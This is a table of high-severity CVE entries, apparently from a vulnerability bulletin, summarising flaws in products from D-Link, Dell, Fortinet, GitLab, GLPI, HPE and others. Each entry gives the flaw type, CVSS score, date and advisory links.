| D-Link--DIR-823X | A weakness has been identified in D-Link DIR-823X 250416. Affected by this issue is the function sub_412E7C of the file /goform/set_wifidog_settings. Executing a manipulation of the argument wd_enable can lead to command injection. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-18 | 7.3 | CVE-2026-1125 | VDB-341717 | D-Link DIR-823X set_wifidog_settings sub_412E7C command injection VDB-341717 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734966 | D-Link DIR-823X Router V250416 Command Execution https://github.com/DavCloudz/cve/blob/main/D-link/DIR_823X/DIR-823X%20V250416%20Command%20Execution%20Vulnerability.md https://www.dlink.com/ |
| danny-avila--LibreChat | LibreChat is a ChatGPT clone with additional features. Prior to v0.8.2-rc2, LibreChat's MCP stdio transport accepts arbitrary commands without validation, allowing any authenticated user to execute shell commands as root inside the container through a single API request. This vulnerability is fixed in v0.8.2-rc2. | 2026-01-12 | 9.1 | CVE-2026-22252 | https://github.com/danny-avila/LibreChat/security/advisories/GHSA-cxhj-j78r-p88f https://github.com/danny-avila/LibreChat/commit/211b39f3113d4e6ecab84be0a83f4e9c9dea127f |
| daschmi--GetContentFromURL | The GetContentFromURL plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0. This is due to the plugin using wp_remote_get() instead of wp_safe_remote_get() to fetch content from a user-supplied URL in the 'url' parameter of the [gcfu] shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-14 | 7.2 | CVE-2025-14613 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b83db6c7-09af-4707-a96b-ee551f27e3b7?source=cve https://plugins.trac.wordpress.org/browser/getcontentfromurl/trunk/classes/shortcode.class.php#L20 https://plugins.trac.wordpress.org/browser/getcontentfromurl/tags/1.0/classes/shortcode.class.php#L20 |
| dashboardbuilder--DASHBOARD BUILDER WordPress plugin for Charts and Graphs | The DASHBOARD BUILDER - WordPress plugin for Charts and Graphs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.7. This is due to missing nonce validation on the settings handler in dashboardbuilder-admin.php. This makes it possible for unauthenticated attackers to modify the stored SQL query and database credentials used by the [show-dashboardbuilder] shortcode via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The modified SQL query is subsequently executed on the front-end when the shortcode is rendered, enabling arbitrary SQL injection and data exfiltration through the publicly visible chart output. | 2026-01-14 | 7.1 | CVE-2025-14615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/106b31ed-d509-4551-a134-02193ab22fe1?source=cve https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder-admin.php#L158 https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder-admin.php#L158 https://plugins.trac.wordpress.org/browser/dashboard-builder/trunk/dashboardbuilder.php#L51 https://plugins.trac.wordpress.org/browser/dashboard-builder/tags/1.5.7/dashboardbuilder.php#L51 |
| Dell--SupportAssist OS Recovery | Dell SupportAssist OS Recovery, versions prior to 5.5.15.1, contain a Creation of Temporary File With Insecure Permissions vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-01-13 | 7.5 | CVE-2025-46685 | https://www.dell.com/support/kbdoc/en-us/000401506/dsa-2025-456 |
| Delta Electronics--DIAView | Delta Electronics DIAView has multiple vulnerabilities. | 2026-01-16 | 9.8 | CVE-2025-62581 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf |
| Delta Electronics--DIAView | Delta Electronics DIAView has multiple vulnerabilities. | 2026-01-16 | 9.8 | CVE-2025-62582 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf |
| Delta Electronics--DIAView | Delta Electronics DIAView has Command Injection vulnerability. | 2026-01-16 | 7.8 | CVE-2026-0975 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00002_DIAView%20-Exposed%20Dangerous%20Method%20Remote%20Code%20Execution%20(CVE-2026-0975).pdf |
| denoland--deno | Deno is a JavaScript, TypeScript, and WebAssembly runtime. Before 2.5.6, a prior patch aimed to block spawning Windows batch/shell files by returning an error when a spawned path's extension matched .bat or .cmd. That check performs a case-sensitive comparison against lowercase literals and therefore can be bypassed when the extension uses alternate casing (for example .BAT, .Bat, etc.). This vulnerability is fixed in 2.5.6. | 2026-01-15 | 8.1 | CVE-2026-22864 | https://github.com/denoland/deno/security/advisories/GHSA-m3c4-prhw-mrx6 https://github.com/denoland/deno/releases/tag/v2.5.6 |
| Denver--Smart Wifi Camera | Denver SHC-150 Smart Wifi Camera contains a hardcoded telnet credential vulnerability that allows unauthenticated attackers to access a Linux shell. Attackers can connect to port 23 using the default credential to execute arbitrary commands on the camera's operating system. | 2026-01-15 | 9.8 | CVE-2021-47796 | ExploitDB-50160 Official Product Homepage VulnCheck Advisory: Denver Smart Wifi Camera SHC-150 - 'Telnet' Remote Code Execution (RCE) |
| dfir-iris--iris-web | Iris is a web collaborative platform that helps incident responders share technical details during investigations. Prior to 2.4.24, the DFIR-IRIS datastore file management system has a vulnerability where mass assignment of the file_local_name field combined with path trust in the delete operation enables authenticated users to delete arbitrary filesystem paths. The vulnerability manifests through a three-step attack chain: authenticated users upload a file to the datastore, update the file's file_local_name field to point to an arbitrary filesystem path through mass assignment, then trigger the delete operation which removes the target file without path validation. This vulnerability is fixed in 2.4.24. | 2026-01-12 | 9.6 | CVE-2026-22783 | https://github.com/dfir-iris/iris-web/security/advisories/GHSA-qhqj-8qw6-wp8v https://github.com/dfir-iris/iris-web/commit/57c1b80494bac187893aebc6d9df1ce6e56485b7 |
| dharashah--Chikitsa Patient Management System | Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability in the backup restoration functionality. Authenticated attackers can upload a modified backup zip file with a malicious PHP shell to execute arbitrary system commands on the server. | 2026-01-15 | 8.8 | CVE-2021-47757 | ExploitDB-50572 Product Webpage Product GitHub Repository Product Sourceforge Page |
| dharashah--Chikitsa Patient Management System | Chikitsa Patient Management System 2.0.2 contains an authenticated remote code execution vulnerability that allows attackers to upload malicious PHP plugins through the module upload functionality. Authenticated attackers can generate and upload a ZIP plugin with a PHP backdoor that enables arbitrary command execution on the server through a weaponized PHP script. | 2026-01-15 | 8.8 | CVE-2021-47758 | ExploitDB-50571 Product Webpage Product GitHub Repository Product Sourceforge Page |
| Diskboss--DiskBoss Service | DiskBoss Service 12.2.18 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path by placing malicious executables in potential path locations to gain system-level access during service startup. | 2026-01-16 | 7.8 | CVE-2021-47822 | ExploitDB-49899 Official Vendor Homepage VulnCheck Advisory: DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path |
| Diskpulse--DiskPulse | DiskPulse Enterprise 13.6.14 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2020-36927 | ExploitDB-50012 Vendor Homepage VulnCheck Advisory: DiskPulse 13.6.14 - Unquoted Service Path |
| Disksavvy--Disk Savvy | Disk Savvy 13.6.14 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in service binaries to inject malicious executables that will be run with elevated LocalSystem privileges. | 2026-01-15 | 7.8 | CVE-2021-47805 | ExploitDB-50024 Vendor Homepage VulnCheck Advisory: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path |
| Disksorter--Disk Sorter Enterprise | Disk Sorter Enterprise 13.6.12 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47809 | ExploitDB-50014 Vendor Homepage VulnCheck Advisory: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path |
| Disksorter--Disk Sorter Server | Disk Sorter Server 13.6.12 contains an unquoted service path vulnerability in its binary path configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Disk Sorter Server\bin\disksrs.exe' to inject malicious executables and escalate privileges. | 2026-01-16 | 7.8 | CVE-2021-47847 | ExploitDB-50013 Vendor Homepage VulnCheck Advisory: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path |
| divisupreme--Supreme Modules Lite Divi Theme, Extra Theme and Divi Builder | The Supreme Modules Lite plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 2.5.62. This is due to insufficient file type validation detecting JSON files, allowing double extension files to bypass sanitization while being accepted as a valid JSON file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-01-15 | 8.8 | CVE-2025-13062 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1819f2eb-51ef-4ba4-9137-ab64710fa6c8?source=cve https://plugins.trac.wordpress.org/changeset/3423427/supreme-modules-for-divi |
| docmost--docmost | Docmost is an open-source collaborative wiki and documentation software. From 0.21.0 to before 0.24.0, Docmost is vulnerable to Arbitrary File Write via Zip Import Feature (ZipSlip). In apps/server/src/integrations/import/utils/file.utils.ts, there are no validation on filename. This vulnerability is fixed in 0.24.0. | 2026-01-15 | 7.1 | CVE-2026-22249 | https://github.com/docmost/docmost/security/advisories/GHSA-54pm-hqxm-54wg https://github.com/docmost/docmost/pull/1753 https://github.com/docmost/docmost/commit/c3b350d943108552e20654580005cd6f6c78ab05 https://github.com/docmost/docmost/releases/tag/v0.24.0 |
| Dolibarr--CRM | Dolibarr ERP-CRM 14.0.2 contains a stored cross-site scripting vulnerability in the ticket creation module that allows low-privilege users to inject malicious scripts. Attackers can craft a specially designed ticket message with embedded JavaScript that triggers when an administrator copies the text, potentially enabling privilege escalation. | 2026-01-15 | 7.2 | CVE-2021-47779 | ExploitDB-50432 Official Dolibarr Vendor Homepage Dolibarr GitHub Repository VulnCheck Advisory: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation |
| donknap--dpanel | DPanel is an open source server management panel written in Go. Prior to 1.9.2, DPanel has an arbitrary file deletion vulnerability in the /api/common/attach/delete interface. Authenticated users can delete arbitrary files on the server via path traversal. When a user logs into the administrative backend, this interface can be used to delete files. The vulnerability lies in the Delete function within the app/common/http/controller/attach.go file. The path parameter submitted by the user is directly passed to storage.Local{}.GetSaveRealPath and subsequently to os.Remove without proper sanitization or checking for path traversal characters (../). And the helper function in common/service/storage/local.go uses filepath.Join, which resolves ../ but does not enforce a chroot/jail. This vulnerability is fixed in 1.9.2. | 2026-01-15 | 8.1 | CVE-2025-66292 | https://github.com/donknap/dpanel/security/advisories/GHSA-vh2x-fw87-4fxq https://github.com/donknap/dpanel/commit/cbda0d90204e8212f2010774345c952e42069119 https://github.com/donknap/dpanel/releases/tag/v1.9.2 |
| Dupscout--Dup Scout | Dup Scout 13.5.28 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files\Dup Scout Server\bin\dupscts.exe' to inject malicious executables and escalate privileges. | 2026-01-15 | 7.8 | CVE-2021-47806 | ExploitDB-50025 Vendor Homepage VulnCheck Advisory: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path |
| dupterminator--DupTerminator | DupTerminator 1.4.5639.37199 contains a denial of service vulnerability that allows attackers to crash the application by inputting a long character string in the Excluded text box. Attackers can generate a payload of 8000 repeated characters to trigger the application to stop working on Windows 10. | 2026-01-16 | 7.5 | CVE-2021-47818 | ExploitDB-49917 DupTerminator Project Homepage VulnCheck Advisory: DupTerminator 1.4.5639.37199 - Denial of Service |
| dvcrn--Markright | Markright 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to embed malicious payloads in markdown files. Attackers can upload specially crafted markdown files that execute arbitrary JavaScript when opened, potentially enabling remote code execution on the victim's system. | 2026-01-16 | 7.2 | CVE-2021-47838 | ExploitDB-49834 Markright GitHub Repository Proof of Concept Video VulnCheck Advisory: Markright 1.0 - Persistent Cross-Site Scripting |
| Dynojet--Dynojet Power Core | Dynojet Power Core 2.3.0 contains an unquoted service path vulnerability in the DJ.UpdateService that allows local authenticated users to potentially execute code with elevated privileges. Attackers can exploit the unquoted binary path by placing malicious executables in the service's file path to gain Local System access. | 2026-01-15 | 7.8 | CVE-2021-47773 | ExploitDB-50466 Official Vendor Homepage |
| E107--e107 CMS | e107 CMS version 3.2.1 contains a critical file upload vulnerability that allows authenticated administrators to override arbitrary server files through path traversal. The vulnerability exists in the Media Manager's remote URL upload functionality (image.php) where the upload_caption parameter is not properly sanitized. An attacker with administrative privileges can use directory traversal sequences (../../../) in the upload_caption field to overwrite critical system files outside the intended upload directory. This can lead to complete compromise of the web application by overwriting configuration files, executable scripts, or other critical system components. The vulnerability was discovered by Hubert Wojciechowski and affects the image.php component in the admin interface. | 2026-01-13 | 7.2 | CVE-2022-50939 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Upload Restriction Bypass with Path Traversal File Override |
| e107--e107 CMS | e107 CMS version 3.2.1 contains multiple vulnerabilities that allow cross-site scripting (XSS) attacks. The first vulnerability is a reflected XSS that occurs in the news comment functionality when authenticated users interact with the comment form. An attacker can inject malicious JavaScript code through the URL parameter that gets executed when users click outside the comment field after typing content. The second vulnerability involves an upload restriction bypass for authenticated administrators, allowing them to upload SVG files containing malicious code through the media manager's remote URL upload feature. This results in stored XSS when the uploaded SVG files are accessed. These vulnerabilities were discovered by Hubert Wojciechowski and affect the news.php and image.php components of the CMS. | 2026-01-13 | 9.8 | CVE-2022-50905 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Reflected XSS via Comment Flow |
| e107--e107 CMS | e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrative users to bypass upload restrictions and execute PHP files. Attackers can upload malicious PHP files to parent directories by manipulating the upload URL parameter, enabling remote code execution through the Media Manager import feature. | 2026-01-13 | 7.2 | CVE-2022-50907 | ExploitDB-50910 Official e107 CMS Vendor Homepage e107 CMS Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Admin Upload Restriction Bypass + RCE |
| e107--e107 CMS | e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server files through the Media Manager import functionality. Attackers can exploit the upload mechanism by manipulating the upload URL parameter to overwrite existing files like top.php in the web application directory. | 2026-01-13 | 7.2 | CVE-2022-50916 | ExploitDB-50910 Official Vendor Homepage Software Download Page VulnCheck Advisory: e107 CMS v3.2.1 - Upload restriction bypass (Authenticated [Admin])+ Server file override |
| EaseUS--EaseUS Data Recovery | EaseUS Data Recovery 15.1.0.0 contains an unquoted service path vulnerability in the EaseUS UPDATE SERVICE executable. Attackers can exploit the unquoted path to inject and execute malicious code with elevated LocalSystem privileges. | 2026-01-13 | 8.4 | CVE-2022-50914 | ExploitDB-50886 EaseUS Official Homepage VulnCheck Advisory: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path |
| Elastic--Kibana | External Control of File Name or Path (CWE-73) combined with Server-Side Request Forgery (CWE-918) can allow an attacker to cause arbitrary file disclosure through a specially crafted credentials JSON payload in the Google Gemini connector configuration. This requires an attacker to have authenticated access with privileges sufficient to create or modify connectors (Alerts & Connectors: All). The server processes a configuration without proper validation, allowing for arbitrary network requests and for arbitrary file reads. | 2026-01-14 | 8.6 | CVE-2026-0532 | https://discuss.elastic.co/t/kibana-8-19-10-9-1-10-9-2-4-security-update-esa-2026-05/384524 |
| Emerson--Emerson PAC Machine Edition | Emerson PAC Machine Edition 9.80 contains an unquoted service path vulnerability in the TrapiServer service that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50930 | ExploitDB-50745 Emerson Official Homepage Software Download Link VulnCheck Advisory: Emerson PAC Machine Edition 9.80 Build 8695 - 'TrapiServer' Unquoted Service Path |
| En--Kingdia CD Extractor | Kingdia CD Extractor 3.0.2 contains a buffer overflow vulnerability in the registration name field that allows attackers to execute arbitrary code. Attackers can craft a malicious payload exceeding 256 bytes to overwrite Structured Exception Handler and gain remote code execution through a bind shell. | 2026-01-15 | 9.8 | CVE-2021-47774 | ExploitDB-50470 Software Download Page |
| envoyproxy--gateway | Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.5.7 and 1.6.2, EnvoyExtensionPolicy Lua scripts executed by Envoy proxy can be used to leak the proxy's credentials. These credentials can then be used to communicate with the control plane and gain access to all secrets that are used by Envoy proxy, e.g. TLS private keys and credentials used for downstream and upstream communication. This vulnerability is fixed in 1.5.7 and 1.6.2. | 2026-01-12 | 8.8 | CVE-2026-22771 | https://github.com/envoyproxy/gateway/security/advisories/GHSA-xrwg-mqj6-6m22 |
| Epic Games--Epic Games Store | A local privilege escalation vulnerability exists during the installation of Epic Games Store via the Microsoft Store. A low-privilege user can replace a DLL file during the installation process, which may result in unintended elevation of privileges. | 2026-01-15 | 8.8 | CVE-2025-61973 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2279 |
| Explorerplusplus--Explorer32++ | Explorer32++ 1.3.5.531 contains a buffer overflow vulnerability in Structured Exception Handler (SEH) records that allows attackers to execute arbitrary code. Attackers can exploit the vulnerability by providing a long file name argument over 396 characters to corrupt the SEH chain and potentially execute malicious code. | 2026-01-13 | 9.8 | CVE-2023-54334 | ExploitDB-51077 Archived Explorer++ Website VulnCheck Advisory: Explorer32++ 1.3.5.531 - Buffer overflow |
| Extplorer--eXtplorer | eXtplorer 2.1.14 contains an authentication bypass vulnerability that allows attackers to login without a password by manipulating the login request. Attackers can exploit this flaw to upload malicious PHP files and execute remote commands on the vulnerable file management system. | 2026-01-13 | 9.8 | CVE-2023-54335 | ExploitDB-51067 Official eXtplorer Product Homepage VulnCheck Advisory: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) |
| FeMiner--wms | A security vulnerability has been detected in FeMiner wms up to 9cad1f1b179a98b9547fd003c23b07c7594775fa. Affected by this vulnerability is an unknown functionality of the file /src/chkuser.php. The manipulation of the argument Username leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 7.3 | CVE-2026-1059 | VDB-341628 | FeMiner wms chkuser.php sql injection VDB-341628 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731236 | GitHub WMS (Warehouse Management System) V1.0 SQL Injection https://github.com/wangchaoxing/CVE/issues/1 |
| FmeAddons--Registration & Login with Mobile Phone Number for WooCommerce | The Registration & Login with Mobile Phone Number for WooCommerce plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.3.1. This is due to the plugin not properly verifying a users identity prior to authenticating them via the fma_lwp_set_session_php_fun() function. This makes it possible for unauthenticated attackers to authenticate as any user on the site, including administrators, without a valid password. | 2026-01-17 | 9.8 | CVE-2025-10484 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6aef6fbb-be8c-49e1-ada5-7b4aa8b2ff72?source=cve https://woocommerce.com/products/registration-login-with-mobile-phone-number/ |
| Fortinet--FortiFone | An exposure of sensitive information to an unauthorized actor [CWE-200] vulnerability in Fortinet FortiFone 7.0.0 through 7.0.1, FortiFone 3.0.13 through 3.0.23 allows an unauthenticated attacker to obtain the device configuration via crafted HTTP or HTTPS requests. | 2026-01-13 | 9.3 | CVE-2025-47855 | https://fortiguard.fortinet.com/psirt/FG-IR-25-260 |
| Fortinet--FortiSIEM | An improper neutralization of special elements used in an os command ('os command injection') vulnerability in Fortinet FortiSIEM 7.4.0, FortiSIEM 7.3.0 through 7.3.4, FortiSIEM 7.1.0 through 7.1.8, FortiSIEM 7.0.0 through 7.0.4, FortiSIEM 6.7.0 through 6.7.10 may allow an attacker to execute unauthorized code or commands via crafted TCP requests. | 2026-01-13 | 9.4 | CVE-2025-64155 | https://fortiguard.fortinet.com/psirt/FG-IR-25-772 |
| Fortinet--FortiSwitchManager | A heap-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiOS 6.4.0 through 6.4.16, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows attacker to execute unauthorized code or commands via specially crafted packets | 2026-01-13 | 7.4 | CVE-2025-25249 | https://fortiguard.fortinet.com/psirt/FG-IR-25-084 |
| Freeter--Freeter | Freeter 1.2.1 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads in custom widget titles and files. Attackers can craft malicious files with embedded scripts that execute when victims interact with the application, potentially enabling remote code execution. | 2026-01-16 | 7.2 | CVE-2021-47835 | ExploitDB-49833 Official Freeter Product Homepage Proof of Concept Video VulnCheck Advisory: Freeter 1.2.1 - Persistent Cross-Site Scripting |
| Gearboxcomputers--WifiHotSpot | WifiHotSpot 1.0.0.0 contains an unquoted service path vulnerability in its WifiHotSpotService.exe that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path during system startup or reboot to inject and run malicious executables with LocalSystem permissions. | 2026-01-16 | 7.8 | CVE-2021-47833 | ExploitDB-49845 WiFi Hotspot Product Page VulnCheck Advisory: WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path |
| getarcaneapp--arcane | Arcane provides modern docker management. Prior to 1.13.0, Arcane has a command injection in the updater service. Arcane's updater service supported lifecycle labels com.getarcaneapp.arcane.lifecycle.pre-update and com.getarcaneapp.arcane.lifecycle.post-update that allowed defining a command to run before or after a container update. The label value is passed directly to /bin/sh -c without sanitization or validation. Because any authenticated user (not limited to administrators) can create projects through the API, an attacker can create a project that specifies one of these lifecycle labels with a malicious command. When an administrator later triggers a container update (either manually or via scheduled update checks), Arcane reads the lifecycle label and executes its value as a shell command inside the container. This vulnerability is fixed in 1.13.0. | 2026-01-15 | 9.1 | CVE-2026-23520 | https://github.com/getarcaneapp/arcane/security/advisories/GHSA-gjqq-6r35-w3r8 https://github.com/getarcaneapp/arcane/pull/1468 https://github.com/getarcaneapp/arcane/commit/5a9c2f92e11f86f8997da8c672844468f930b7e4 https://github.com/getarcaneapp/arcane/releases/tag/v1.13.0 |
| Getgrav--GravCMS | GravCMS 1.10.7 contains an unauthenticated vulnerability that allows remote attackers to write arbitrary YAML configuration and execute PHP code through the scheduler endpoint. Attackers can exploit the admin-nonce parameter to inject base64-encoded payloads and create malicious custom jobs with system command execution. | 2026-01-15 | 7.5 | CVE-2021-47812 | ExploitDB-49973 Official Grav CMS Homepage VulnCheck Advisory: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) |
| Getoutline--Outline | Outline 1.6.0 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the OutlineService executable to inject malicious code that will be executed with LocalSystem permissions. | 2026-01-13 | 8.4 | CVE-2023-54331 | ExploitDB-51128 Official Outline Product Homepage VulnCheck Advisory: Outline 1.6.0 - Unquoted Service Path |
| Github--Sandboxie Plus | Sandboxie Plus 0.7.4 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted path during system startup or reboot to inject and run malicious executables with LocalSystem permissions. | 2026-01-16 | 7.8 | CVE-2021-47832 | ExploitDB-49842 Sandboxie Plus GitHub Repository VulnCheck Advisory: Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.10 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that could have allowed an authenticated user to execute stored cross-site scripting through improper input validation in the Kubernetes proxy functionality. | 2026-01-14 | 7.7 | CVE-2025-11224 | https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/ GitLab Issue #573223 HackerOne Bug Bounty Report #3277291 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. Prior to 10.0.21 and 11.0.3, an unauthorized user can access GLPI documents attached to any item (ticket, asset, ...). If the public FAQ is enabled, this unauthorized access can be performed by an anonymous user. This vulnerability is fixed in 10.0.21 and 11.0.3. | 2026-01-15 | 7.5 | CVE-2025-64516 | https://github.com/glpi-project/glpi/security/advisories/GHSA-487h-7mxm-7r46 https://github.com/glpi-project/glpi/commit/51412a89d3174cfe22967b051d527febdbceab3c https://github.com/glpi-project/glpi/commit/ee7ee28e0645198311c0a9e0c4e4b712b8788e27 https://github.com/glpi-project/glpi/releases/tag/10.0.21 https://github.com/glpi-project/glpi/releases/tag/11.0.3 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. From 11.0.0, < 11.0.3, an unauthenticated user can perform a SQL injection through the inventory endpoint. This vulnerability is fixed in 11.0.3. | 2026-01-15 | 7.5 | CVE-2025-66417 | https://github.com/glpi-project/glpi/security/advisories/GHSA-p467-682w-9cc9 |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality. | 2026-01-16 | 9.8 | CVE-2026-1019 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attacker to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-16 | 9.8 | CVE-2026-1021 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| Gotac--Police Statistics Database System | Police Statistics Database System developed by Gotac has an Arbitrary File Read vulnerability, allowing Unauthenticated remote attacker to exploit Absolute Path Traversal to download arbitrary system files. | 2026-01-16 | 7.5 | CVE-2026-1018 | https://www.twcert.org.tw/tw/cp-132-10637-3e4b3-1.html https://www.twcert.org.tw/en/cp-139-10638-0e44b-2.html |
| Gotac--Statistics Database System | Statistics Database System developed by Gotac has an Arbitrary File Read vulnerability, allowing unauthenticated remote attackers to exploit Relative Path Traversal to download arbitrary system files. | 2026-01-16 | 7.5 | CVE-2026-1022 | https://www.twcert.org.tw/tw/cp-132-10639-813ad-1.html https://www.twcert.org.tw/en/cp-139-10640-0fd0b-2.html |
| Gotac--Statistics Database System | Statistics Database System developed by Gotac has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to directly exploit a specific functionality to query database contents. | 2026-01-16 | 7.5 | CVE-2026-1023 | https://www.twcert.org.tw/tw/cp-132-10639-813ad-1.html https://www.twcert.org.tw/en/cp-139-10640-0fd0b-2.html |
| Grocerycrud--Grocery crud | Grocery Crud 1.6.4 contains a SQL injection vulnerability in the order_by parameter that allows remote attackers to manipulate database queries. Attackers can inject malicious SQL code through the order_by[] parameter in POST requests to the ajax_list endpoint to potentially extract or modify database information. | 2026-01-15 | 8.2 | CVE-2021-47811 | ExploitDB-49985 Vendor Homepage Software Download Page VulnCheck Advisory: Grocery crud 1.6.4 - 'order_by' SQL Injection |
| h3js--h3 | H3 is a minimal H(TTP) framework built for high performance and portability. Prior to 1.15.5, there is a critical HTTP Request Smuggling vulnerability. readRawBody is doing a strict case-sensitive check for the Transfer-Encoding header. It explicitly looks for "chunked", but per the RFC, this header should be case-insensitive. This vulnerability is fixed in 1.15.5. | 2026-01-15 | 8.9 | CVE-2026-23527 | https://github.com/h3js/h3/security/advisories/GHSA-mp2g-9vg9-f4cg https://github.com/h3js/h3/commit/618ccf4f37b8b6148bea7f36040471af45bfb097 |
| HCL Software--MyXalytics | HCL MyXalytics v6.7 is affected by improper management of a static JWT signing secret in the web application, where the secret lacks rotation , introducing a security risk | 2026-01-16 | 7.4 | CVE-2025-59870 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128115 |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | Arbitrary file deletion vulnerability have been identified in a system function of mobility conductors running AOS-8 operating system. Successful exploitation of this vulnerability could allow an unauthenticated remote malicious actor to delete arbitrary files within the affected system and potentially result in denial-of-service conditions on affected devices. | 2026-01-13 | 8.2 | CVE-2025-37168 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
| Hewlett Packard Enterprise (HPE)--ArubaOS (AOS) | A stack overflow vulnerability exists in the AOS-10 web-based management interface of a Mobility Gateway. Successful exploitation could allow an authenticated malicious actor to execute arbitrary code as a privileged user on the underlying operating system. | 2026-01-13 | 7.2 | CVE-2025-37169 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US |
